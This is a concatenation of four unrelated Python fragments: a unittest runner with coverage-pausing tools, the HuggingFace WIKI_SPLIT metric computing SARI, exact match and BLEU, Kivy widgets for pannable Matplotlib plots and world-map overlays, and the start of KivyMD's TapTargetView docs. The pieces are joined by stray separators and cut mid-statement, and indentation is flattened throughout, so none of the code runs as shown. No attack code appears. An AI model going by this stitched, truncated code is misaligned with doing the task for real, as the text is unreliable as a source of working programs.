cls.ctx_stack.append(pause_trace())
cls.ctx_stack[-1].__enter__()
@classmethod
@deprecated('[lgc 0.63.1] Use the pause_trace() context manager')
def resume_tracing(cls):
cls.ctx_stack.pop().__exit__(None, None, None)
pause_tracing = TraceController.pause_tracing
resume_tracing = TraceController.resume_tracing
def nocoverage(func):
"""Function decorator that pauses tracing functions"""
if hasattr(func, 'uncovered'):
return func
func.uncovered = True
def not_covered(*args, **kwargs):
with pause_trace():
return func(*args, **kwargs)
not_covered.uncovered = True
return not_covered
## end of coverage pausing tools
TESTFILE_RE = re.compile("^((unit)?test.*|smoketest)\.py$")
def this_is_a_testfile(filename):
"""returns True if `filename` seems to be a test file"""
return TESTFILE_RE.match(osp.basename(filename))
TESTDIR_RE = re.compile("^(unit)?tests?$")
def this_is_a_testdir(dirpath):
"""returns True if `filename` seems to be a test directory"""
return TESTDIR_RE.match(osp.basename(dirpath))
def load_pytest_conf(path, parser):
"""loads a ``pytestconf.py`` file and update default parser
and / or tester.
"""
namespace = {}
exec(open(path, 'rb').read(), namespace)
if 'update_parser' in namespace:
namespace['update_parser'](parser)
return namespace.get('CustomPyTester', PyTester)
def project_root(parser, projdir=os.getcwd()):
"""try to find project's root and add it to sys.path"""
previousdir = curdir = osp.abspath(projdir)
testercls = PyTester
conf_file_path = osp.join(curdir, CONF_FILE)
if osp.isfile(conf_file_path):
testercls = load_pytest_conf(conf_file_path, parser)
while this_is_a_testdir(curdir) or \
osp.isfile(osp.join(curdir, '__init__.py')):
newdir = osp.normpath(osp.join(curdir, os.pardir))
if newdir == curdir:
break
previousdir = curdir
curdir = newdir
conf_file_path = osp.join(curdir, CONF_FILE)
if osp.isfile(conf_file_path):
testercls = load_pytest_conf(conf_file_path, parser)
return previousdir, testercls
class GlobalTestReport(object):
"""this class holds global test statistics"""
def __init__(self):
self.ran = 0
self.skipped = 0
self.failures = 0
self.errors = 0
self.ttime = 0
self.ctime = 0
self.modulescount = 0
self.errmodules = []
def feed(self, filename, testresult, ttime, ctime):
"""integrates new test information into internal statistics"""
ran = testresult.testsRun
self.ran += ran
self.skipped += len(getattr(testresult, 'skipped', ()))
self.failures += len(testresult.failures)
self.errors += len(testresult.errors)
self.ttime += ttime
self.ctime += ctime
self.modulescount += 1
if not testresult.wasSuccessful():
problems = len(testresult.failures) + len(testresult.errors)
self.errmodules.append((filename[:-3], problems, ran))
def failed_to_test_module(self, filename):
"""called when the test module could not be imported by unittest
"""
self.errors += 1
self.modulescount += 1
self.ran += 1
self.errmodules.append((filename[:-3], 1, 1))
def skip_module(self, filename):
self.modulescount += 1
self.ran += 1
self.errmodules.append((filename[:-3], 0, 0))
def __str__(self):
"""this is just presentation stuff"""
line1 = ['Ran %s test cases in %.2fs (%.2fs CPU)'
% (self.ran, self.ttime, self.ctime)]
if self.errors:
line1.append('%s errors' % self.errors)
if self.failures:
line1.append('%s failures' % self.failures)
if self.skipped:
line1.append('%s skipped' % self.skipped)
modulesok = self.modulescount - len(self.errmodules)
if self.errors or self.failures:
line2 = '%s modules OK (%s failed)' % (modulesok,
len(self.errmodules))
descr = ', '.join(['%s [%s/%s]' % info for info in self.errmodules])
line3 = '\nfailures: %s' % descr
elif modulesok:
line2 = 'All %s modules OK' % modulesok
line3 = ''
else:
return ''
return '%s\n%s%s' % (', '.join(line1), line2, line3)
def remove_local_modules_from_sys(testdir):
"""remove all modules from cache that come from `testdir`
This is used to avoid strange side-effects when using the
testall() mode of pytest.
For instance, if we run pytest on this tree::
A/test/test_utils.py
B/test/test_utils.py
we **have** to clean sys.modules to make sure the correct test_utils
module is ran in B
"""
for modname, mod in list(sys.modules.items()):
if mod is None:
continue
if not hasattr(mod, '__file__'):
# this is the case of some built-in modules like sys, imp, marshal
continue
modfile = mod.__file__
# if modfile is not an absolute path, it was probably loaded locally
# during the tests
if not osp.isabs(modfile) or modfile.startswith(testdir):
del sys.modules[modname]
class PyTester(object):
"""encapsulates testrun logic"""
def __init__(self, cvg, options):
self.report = GlobalTestReport()
self.cvg = cvg
self.options = options
self.firstwrite = True
self._errcode = None
def show_report(self):
"""prints the report and returns appropriate exitcode"""
# everything has been ran, print report
print("*" * 79)
print(self.report)
def get_errcode(self):
# errcode set explicitly
if self._errcode is not None:
return self._errcode
return self.report.failures + self.report.errors
def set_errcode(self, errcode):
self._errcode = errcode
errcode = property(get_errcode, set_errcode)
def testall(self, exitfirst=False):
"""walks through current working directory, finds something
which can be considered as a testdir and runs every test there
"""
here = os.getcwd()
for dirname, dirs, _ in os.walk(here):
for skipped in STD_BLACKLIST:
if skipped in dirs:
dirs.remove(skipped)
basename = osp.basename(dirname)
if this_is_a_testdir(basename):
print("going into", dirname)
# we found a testdir, let's explore it !
if not self.testonedir(dirname, exitfirst):
break
dirs[:] = []
if self.report.ran == 0:
print("no test dir found testing here:", here)
# if no test was found during the visit, consider
# the local directory as a test directory even if
# | |
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors and the current dataset script contributor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" WIKI_SPLIT metric."""
import re
import string
from collections import Counter
import sacrebleu
import sacremoses
from packaging import version
import datasets
_CITATION = """
@inproceedings{xu-etal-2016-optimizing,
title = {Optimizing Statistical Machine Translation for Text Simplification},
authors={<NAME> <NAME> <NAME> <NAME> Callison-Burch, Chris},
journal = {Transactions of the Association for Computational Linguistics},
volume = {4},
year={2016},
url = {https://www.aclweb.org/anthology/Q16-1029},
pages = {401--415
},
@inproceedings{post-2018-call,
title = "A Call for Clarity in Reporting {BLEU} Scores",
author = "<NAME>",
booktitle = "Proceedings of the Third Conference on Machine Translation: Research Papers",
month = oct,
year = "2018",
address = "Belgium, Brussels",
publisher = "Association for Computational Linguistics",
url = "https://www.aclweb.org/anthology/W18-6319",
pages = "186--191",
}
"""
_DESCRIPTION = """\
WIKI_SPLIT is the combination of three metrics SARI, EXACT and SACREBLEU
It can be used to evaluate the quality of machine-generated texts.
"""
_KWARGS_DESCRIPTION = """
Calculates sari score (between 0 and 100) given a list of source and predicted
sentences, and a list of lists of reference sentences. It also computes the BLEU score as well as the exact match score.
Args:
sources: list of source sentences where each sentence should be a string.
predictions: list of predicted sentences where each sentence should be a string.
references: list of lists of reference sentences where each sentence should be a string.
Returns:
sari: sari score
sacrebleu: sacrebleu score
exact: exact score
Examples:
>>> sources=["About 95 species are currently accepted ."]
>>> predictions=["About 95 you now get in ."]
>>> references=[["About 95 species are currently known ."]]
>>> wiki_split = datasets.load_metric("wiki_split")
>>> results = wiki_split.compute(sources=sources, predictions=predictions, references=references)
>>> print(results)
{'sari': 21.805555555555557, 'sacrebleu': 14.535768424205482, 'exact': 0.0}
"""
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r"\b(a|an|the)\b", re.UNICODE)
return re.sub(regex, " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def compute_exact(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_em(predictions, references):
scores = [any([compute_exact(ref, pred) for ref in refs]) for pred, refs in zip(predictions, references)]
return (sum(scores) / len(scores)) * 100
def SARIngram(sgrams, cgrams, rgramslist, numref):
rgramsall = [rgram for rgrams in rgramslist for rgram in rgrams]
rgramcounter = Counter(rgramsall)
sgramcounter = Counter(sgrams)
sgramcounter_rep = Counter()
for sgram, scount in sgramcounter.items():
sgramcounter_rep[sgram] = scount * numref
cgramcounter = Counter(cgrams)
cgramcounter_rep = Counter()
for cgram, ccount in cgramcounter.items():
cgramcounter_rep[cgram] = ccount * numref
# KEEP
keepgramcounter_rep = sgramcounter_rep & cgramcounter_rep
keepgramcountergood_rep = keepgramcounter_rep & rgramcounter
keepgramcounterall_rep = sgramcounter_rep & rgramcounter
keeptmpscore1 = 0
keeptmpscore2 = 0
for keepgram in keepgramcountergood_rep:
keeptmpscore1 += keepgramcountergood_rep[keepgram] / keepgramcounter_rep[keepgram]
# Fix an alleged bug [2] in the keep score computation.
# keeptmpscore2 += keepgramcountergood_rep[keepgram] / keepgramcounterall_rep[keepgram]
keeptmpscore2 += keepgramcountergood_rep[keepgram]
# Define 0/0=1 instead of 0 to give higher scores for predictions that match
# a target exactly.
keepscore_precision = 1
keepscore_recall = 1
if len(keepgramcounter_rep) > 0:
keepscore_precision = keeptmpscore1 / len(keepgramcounter_rep)
if len(keepgramcounterall_rep) > 0:
# Fix an alleged bug [2] in the keep score computation.
# keepscore_recall = keeptmpscore2 / len(keepgramcounterall_rep)
keepscore_recall = keeptmpscore2 / sum(keepgramcounterall_rep.values())
keepscore = 0
if keepscore_precision > 0 or keepscore_recall > 0:
keepscore = 2 * keepscore_precision * keepscore_recall / (keepscore_precision + keepscore_recall)
# DELETION
delgramcounter_rep = sgramcounter_rep - cgramcounter_rep
delgramcountergood_rep = delgramcounter_rep - rgramcounter
delgramcounterall_rep = sgramcounter_rep - rgramcounter
deltmpscore1 = 0
deltmpscore2 = 0
for delgram in delgramcountergood_rep:
deltmpscore1 += delgramcountergood_rep[delgram] / delgramcounter_rep[delgram]
deltmpscore2 += delgramcountergood_rep[delgram] / delgramcounterall_rep[delgram]
# Define 0/0=1 instead of 0 to give higher scores for predictions that match
# a target exactly.
delscore_precision = 1
if len(delgramcounter_rep) > 0:
delscore_precision = deltmpscore1 / len(delgramcounter_rep)
# ADDITION
addgramcounter = set(cgramcounter) - set(sgramcounter)
addgramcountergood = set(addgramcounter) & set(rgramcounter)
addgramcounterall = set(rgramcounter) - set(sgramcounter)
addtmpscore = 0
for addgram in addgramcountergood:
addtmpscore += 1
# Define 0/0=1 instead of 0 to give higher scores for predictions that match
# a target exactly.
addscore_precision = 1
addscore_recall = 1
if len(addgramcounter) > 0:
addscore_precision = addtmpscore / len(addgramcounter)
if len(addgramcounterall) > 0:
addscore_recall = addtmpscore / len(addgramcounterall)
addscore = 0
if addscore_precision > 0 or addscore_recall > 0:
addscore = 2 * addscore_precision * addscore_recall / (addscore_precision + addscore_recall)
return (keepscore, delscore_precision, addscore)
def SARIsent(ssent, csent, rsents):
numref = len(rsents)
s1grams = ssent.split(" ")
c1grams = csent.split(" ")
s2grams = []
c2grams = []
s3grams = []
c3grams = []
s4grams = []
c4grams = []
r1gramslist = []
r2gramslist = []
r3gramslist = []
r4gramslist = []
for rsent in rsents:
r1grams = rsent.split(" ")
r2grams = []
r3grams = []
r4grams = []
r1gramslist.append(r1grams)
for i in range(0, len(r1grams) - 1):
if i < len(r1grams) - 1:
r2gram = r1grams[i] + " " + r1grams[i + 1]
r2grams.append(r2gram)
if i < len(r1grams) - 2:
r3gram = r1grams[i] + " " + r1grams[i + 1] + " " + r1grams[i + 2]
r3grams.append(r3gram)
if i < len(r1grams) - 3:
r4gram = r1grams[i] + " " + r1grams[i + 1] + " " + r1grams[i + 2] + " " + r1grams[i + 3]
r4grams.append(r4gram)
r2gramslist.append(r2grams)
r3gramslist.append(r3grams)
r4gramslist.append(r4grams)
for i in range(0, len(s1grams) - 1):
if i < len(s1grams) - 1:
s2gram = s1grams[i] + " " + s1grams[i + 1]
s2grams.append(s2gram)
if i < len(s1grams) - 2:
s3gram = s1grams[i] + " " + s1grams[i + 1] + " " + s1grams[i + 2]
s3grams.append(s3gram)
if i < len(s1grams) - 3:
s4gram = s1grams[i] + " " + s1grams[i + 1] + " " + s1grams[i + 2] + " " + s1grams[i + 3]
s4grams.append(s4gram)
for i in range(0, len(c1grams) - 1):
if i < len(c1grams) - 1:
c2gram = c1grams[i] + " " + c1grams[i + 1]
c2grams.append(c2gram)
if i < len(c1grams) - 2:
c3gram = c1grams[i] + " " + c1grams[i + 1] + " " + c1grams[i + 2]
c3grams.append(c3gram)
if i < len(c1grams) - 3:
c4gram = c1grams[i] + " " + c1grams[i + 1] + " " + c1grams[i + 2] + " " + c1grams[i + 3]
c4grams.append(c4gram)
(keep1score, del1score, add1score) = SARIngram(s1grams, c1grams, r1gramslist, numref)
(keep2score, del2score, add2score) = SARIngram(s2grams, c2grams, r2gramslist, numref)
(keep3score, del3score, add3score) = SARIngram(s3grams, c3grams, r3gramslist, numref)
(keep4score, del4score, add4score) = SARIngram(s4grams, c4grams, r4gramslist, numref)
avgkeepscore = sum([keep1score, keep2score, keep3score, keep4score]) / 4
avgdelscore = sum([del1score, del2score, del3score, del4score]) / 4
avgaddscore = sum([add1score, add2score, add3score, add4score]) / 4
finalscore = (avgkeepscore + avgdelscore + avgaddscore) / 3
return finalscore
def normalize(sentence, lowercase: bool = True, tokenizer: str = "13a", return_str: bool = True):
# Normalization is requried for the ASSET dataset (one of the primary
# datasets in sentence simplification) to allow using space
# to split the sentence. Even though Wiki-Auto and TURK datasets,
# do not require normalization, we do it for consistency.
# Code adapted from the EASSE library [1] written by the authors of the ASSET dataset.
# [1] https://github.com/feralvam/easse/blob/580bba7e1378fc8289c663f864e0487188fe8067/easse/utils/preprocessing.py#L7
if lowercase:
sentence = sentence.lower()
if tokenizer in ["13a", "intl"]:
if version.parse(sacrebleu.__version__).major >= 2:
normalized_sent = sacrebleu.metrics.bleu._get_tokenizer(tokenizer)()(sentence)
else:
normalized_sent = sacrebleu.TOKENIZERS[tokenizer]()(sentence)
elif tokenizer == "moses":
normalized_sent = sacremoses.MosesTokenizer().tokenize(sentence, return_str=True, escape=False)
elif tokenizer == "penn":
normalized_sent = sacremoses.MosesTokenizer().penn_tokenize(sentence, return_str=True)
else:
normalized_sent = sentence
if not return_str:
normalized_sent = normalized_sent.split()
return normalized_sent
def compute_sari(sources, predictions, references):
if not (len(sources) == len(predictions) == len(references)):
raise ValueError("Sources length must match predictions and references lengths.")
sari_score = 0
for src, pred, refs in zip(sources, predictions, references):
sari_score | |
from kivy.clock import Clock
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ObjectProperty, ListProperty, StringProperty
from kivy.core.image import Image
from array import array
import numpy as np
import copy
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
__mydebug__ = True
class InteractivePlotWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
def __init__(self, **kwargs):
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx
print("On init:",self.nx,self.ny)
with self.canvas:
Color(1, 1, 1)
self.texture = Texture.create(size=(self.nx,self.ny))
self.buf = [0,0,0,255]*(self.nx*self.ny)
self.arr = array('B',self.buf)
self.update_mpl()
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture, index=0)
self.texture.wrap = 'clamp_to_edge'
# create a rectangle on which to plot texture (will be at index 0)
Color(1,1,1)
self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractivePlotWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def zoom_in(self) :
if (__mydebug__) :
print("InteractivePlotWidget.zoom_in:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__mydebug__) :
print("InteractivePlotWidget.zoom_in:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__mydebug__) :
print(" :",self.rect.tex_coords,self.height)
def zoom_out(self) :
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__mydebug__) :
print("InteractivePlotWidget.zoom_out:",old_size,self.rect.size,y_shift)
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def resize(self,widget,newsize) :
if (__mydebug__) :
print("InteractivePlotWidget.resize:",newsize)
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def set_zoom_factor(self,value) :
self.rect.size = self.check_size(self.nx*value,self.ny*value)
x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def check_boundaries(self,tex_coords) :
new_tex_coords = [0]*len(tex_coords)
max_x_shift = max((self.rect.size[0]-self.width)/self.rect.size[0],0)
new_tex_coords[0] = max(min(tex_coords[0],max_x_shift),0)
new_tex_coords[2] = max(min(tex_coords[2],1+max_x_shift),1)
new_tex_coords[4] = max(min(tex_coords[4],1+max_x_shift),1)
new_tex_coords[6] = max(min(tex_coords[6],max_x_shift),0)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
canvas.draw()
self.buf = np.asarray(canvas.buffer_rgba()).ravel()
self.arr = array('B', self.buf)
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
pass
fs_multitexture = '''
$HEADER$
// New uniform that will receive texture at index 1
uniform sampler2D texture1;
void main(void) {
// multiple current color with both texture (0 and 1).
// currently, both will use exactly the same texture coordinates.
//gl_FragColor = frag_color * \
// texture2D(texture0, tex_coord0) * \
// texture2D(texture1, tex_coord0);
vec4 c0 = texture2D(texture0, tex_coord0);
vec4 c1 = texture2D(texture1, tex_coord0);
//gl_FragColor = vec4 ((c0.r*c0.a+c1.r*c1.a)/(c0.a+c1.a),(c0.g*c0.a+c1.g*c1.a)/(c0.a+c1.a),(c0.b*c0.a+c1.b*c1.a)/(c0.a+c1.a),1.0);
//gl_FragColor = (1.0/(c0.a+10.0*c1.a)) * (c0.a*c0 + 10.0*c1.a*c1) ;
gl_FragColor = (1.0-c1.a)*c0 + c1.a*c1;
}
'''
class InteractiveWorldMapOverlayWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
texture_wrap = StringProperty('repeat')
def __init__(self, **kwargs):
self.canvas = RenderContext()
self.canvas.shader.fs = fs_multitexture
self.nx = 1024
self.ny = self.nx//2
print("On init:",self.nx,self.ny)
with self.canvas:
# Overlay texture
self.texture1 = Texture.create(size=(self.nx,self.ny))
self.buf = [255,255,255,0]*(self.nx*self.ny)
self.arr = array('B',self.buf)
self.update_mpl()
self.texture1.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture1, index=1)
self.texture1.wrap = self.texture_wrap
# Background texture
self.texture2 = Image('./images/world_spherical.jpg').texture
self.texture2.wrap = self.texture_wrap
self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture2)
self.rect.tex_coords = self.tex_coords
if (__mydebug__) :
print("InteractiveWorldMapOverlayWidget._init__ rect.size:",self.rect.size)
# set the texture1 to use texture index 1
self.canvas['texture1'] = 1
# Don't restrict zooming at start
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractiveWorldMapOverlayWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
if (__mydebug__) :
print("InteractiveWorldMapOverlayWidget.on_touch_move:")
print(" tex_coords before :",self.tex_coords)
print(" size/pos/width/height :",self.rect.size,self.rect.pos,self.width,self.height)
self.tex_coords = self.check_boundaries(self.tex_coords)
if (__mydebug__) :
print("InteractiveWorldMapOverlayWidget.on_touch_move:")
print(" tex_coords after :",self.tex_coords)
print(" size/pos/width/height :",self.rect.size,self.rect.pos,self.width,self.height)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
self.rect.size = self.check_size((self.nx*self.height/self.ny,self.height))
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def zoom_in(self) :
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
if (__mydebug__) :
print("InteractiveWorldMapOverlayWidget.zoom_in",self.rect.size,self.rect.pos,self.width)
def zoom_out(self) :
self.rect.size = self.check_size((self.rect.size[0]*0.707,self.rect.size[1]*0.707))
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
if (__mydebug__) :
print("InteractiveWorldMapOverlayWidget.zoom_in:",self.rect.size,self.rect.pos,self.width)
def resize(self,widget,newsize) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
self.rect.size = self.check_size((self.nx*self.height/self.ny,self.height))
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def set_zoom_factor(self,value) :
self.rect.size = self.check_size((self.nx*value,self.ny*value))
x_shift = -0.5*(self.width-self.rect.size[0])/float(self.rect.size[0])
y_shift = 0.5*(self.height-self.rect.size[1])/float(self.rect.size[1])
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
self.rect.pos = (max(0,0.5*(self.width-self.rect.size[0])),(self.height-self.rect.size[1]))
def check_boundaries(self,tex_coords) :
new_tex_coords = copy.copy(tex_coords)
max_y_shift = max((self.rect.size[1]-self.height)/self.rect.size[1],0)
new_tex_coords[1] = max(min(tex_coords[1],1+max_y_shift),1)
new_tex_coords[3] = max(min(tex_coords[3],1+max_y_shift),1)
new_tex_coords[5] = max(min(tex_coords[5],max_y_shift),0)
new_tex_coords[7] = max(min(tex_coords[7],max_y_shift),0)
return new_tex_coords
def check_size(self,size) :
return size
def update_mpl(self,**kwargs) :
fig = Figure(figsize=(self.nx/64,self.ny/64),dpi=64)
canvas = FigureCanvas(fig)
ax = fig.add_subplot(111,position=[0,0,1,1])
self.generate_mpl_plot(fig,ax,**kwargs)
canvas.draw()
self.buf = np.asarray(canvas.buffer_rgba()).ravel()
self.arr = array('B', self.buf)
self.texture1.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
def generate_mpl_plot(self,fig,ax,**kwargs) :
# This is where we insert a Matplotlib figure. Must use ax. and fig. child commands.
# You probably want, but do not require, the following in your over-lay
ax.set_facecolor((0,0,0,0))
fig.set_facecolor((0,0,0,0))
class InteractiveWorldMapWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
texture_wrap = StringProperty('repeat')
def __init__(self, **kwargs):
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx//2
if (__mydebug__) :
print("On init:",self.nx,self.ny)
with self.canvas:
# Background texture
self.texture = Image('./images/world_spherical.jpg').texture
self.texture.wrap = self.texture_wrap
self.rect = Rectangle(size=(self.nx,self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
if (__mydebug__) :
print("InteractiveWorldMapWidget._init__ rect.size:",self.rect.size)
# Don't restrict zooming at start
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractiveWorldMapWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
if | |
<reponame>Jonypr-code/KivyMD
"""
Components/TapTargetView
========================
.. seealso::
`TapTargetView, GitHub <https://github.com/KeepSafe/TapTargetView>`_
`TapTargetView, Material archive <https://material.io/archive/guidelines/growth-communications/feature-discovery.html#>`_
.. rubric:: Provide value and improve engagement by introducing users to new
features and functionality at relevant moments.
.. image:: https://github.com/HeaTTheatR/KivyMD-data/raw/master/gallery/kivymddoc/tap-target-view-previous.gif
:align: center
Usage
-----
.. code-block:: python
from kivy.lang import Builder
from kivymd.app import MDApp
from kivymd.uix.taptargetview import MDTapTargetView
KV = '''
Screen:
MDFloatingActionButton:
